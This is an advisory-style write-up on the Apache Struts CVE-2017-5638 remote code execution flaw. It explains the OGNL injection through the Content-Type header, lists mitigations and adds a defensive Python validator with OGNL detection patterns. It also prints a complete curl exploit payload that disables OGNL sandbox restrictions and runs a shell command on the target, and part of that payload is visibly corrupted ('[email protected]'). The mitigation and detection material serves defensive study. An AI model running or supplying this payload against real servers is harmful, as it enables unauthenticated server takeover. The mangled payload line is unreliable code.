Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)


How the mentioned CVE works

CVE-2017-5638 resides in the Jakarta Multipart parser of Apache Struts. The flaw is triggered when a malicious `Content-Type` header is sent with a file upload request. Instead of treating the `Content-Type` value as plain data, the parser's error-handling path hands it to the Object-Graph Navigation Language (OGNL) engine, which evaluates it as an expression. An attacker can therefore craft a request whose `Content-Type` header carries an OGNL expression. Because OGNL expressions run on the server side with significant privileges, this yields remote code execution. The vulnerability is exploitable without any authentication wherever the affected endpoint is exposed, which makes it highly dangerous. The root cause is the exception handler’s failure to sanitize user input before passing it to the OGNL engine.
Platform: Apache Struts

Version: 2.3.5 – 2.3.31

Vulnerability: Remote Code Execution

Severity: Critical

Date: 2017-03-07

Prediction: Patch Available

What Undercode Says:

`curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://vulnerable-server.com/upload.action`

How It Is Exploited:

Craft malicious HTTP request.

Target vulnerable Struts endpoint.

Execute OGNL expressions.

Achieve remote code execution.

Protection from this CVE

Apply official patch.

Upgrade Struts version.

Use input validation.

Deploy a WAF.
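As an added defensive example (not code from the original post), the following Python validator applies the input-validation and WAF advice above to the mechanism described in the first section: it allows only `Content-Type` values that fit the RFC 7230 media-type grammar and labels rejected values that carry OGNL expression syntax so they can be triaged as CVE-2017-5638 probes rather than broken clients. The sample requests are constructed, and the OGNL-shaped value is a harmless stand-in, not a working payload.

```python
from __future__ import annotations
import re

# tchar from RFC 7230 section 3.2.6: the characters allowed in a header token.
TCHAR = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
# Allowlist grammar for a Content-Type value: type/subtype plus optional
# ";name=value" parameters (token or quoted-string). Nothing else passes,
# so "%{...}" is rejected whether or not it matches a known signature.
MEDIA_TYPE_RE = re.compile(
    r"^\s*" + TCHAR + "/" + TCHAR
    + r"(\s*;\s*" + TCHAR + r"=(?:" + TCHAR + r"|\"[^\"]*\"))*\s*$"
)
# OGNL evaluation syntax, used only to label a rejected value for triage:
# "%{"/"${" expression delimiters, "@class@member" static references, and the
# sandbox-bypass variable name _memberAccess seen in the payload above.
OGNL_MARKER_RE = re.compile(r"%\{|\$\{|@[A-Za-z_][\w.]*@|_memberAccess")


def classify_content_type(value: str) -> tuple[str, str]:
    """Return ("allow", "") or ("block", reason) for one Content-Type value."""
    if MEDIA_TYPE_RE.match(value):
        return "allow", ""
    if OGNL_MARKER_RE.search(value):
        return "block", "ognl-expression-syntax"   # CVE-2017-5638 style probe
    return "block", "malformed-media-type"         # broken client, not an attack


def triage(requests: list[dict[str, str]]) -> list[tuple[str, str, str]]:
    """Classify each request's Content-Type; returns (path, verdict, reason)."""
    return [
        (req["path"], *classify_content_type(req.get("Content-Type", "")))
        for req in requests
    ]


# Constructed sample requests (not captured traffic). The second uses the
# shape of an OGNL expression with a harmless body, not a working payload.
SAMPLE_REQUESTS = [
    {"path": "/upload.action",
     "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk"},
    {"path": "/upload.action",
     "Content-Type": "%{(#_='multipart/form-data').(#probe=1)}"},
    {"path": "/upload.action", "Content-Type": "multipart/form-data; boundary"},
    {"path": "/login.action", "Content-Type": "application/x-www-form-urlencoded"},
]

if __name__ == "__main__":
    for path, verdict, reason in triage(SAMPLE_REQUESTS):
        print(f"{path:15} {verdict:5} {reason}")
```

The allowlist decides; the marker scan only changes the label, so a future payload that avoids these markers is still blocked as a malformed media type.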

Impact:

Full server compromise.

Data theft.

Service disruption.

Arbitrary code execution.


Sources:

Reported By: nvd.nist.gov
Extra Source Hub: Undercode
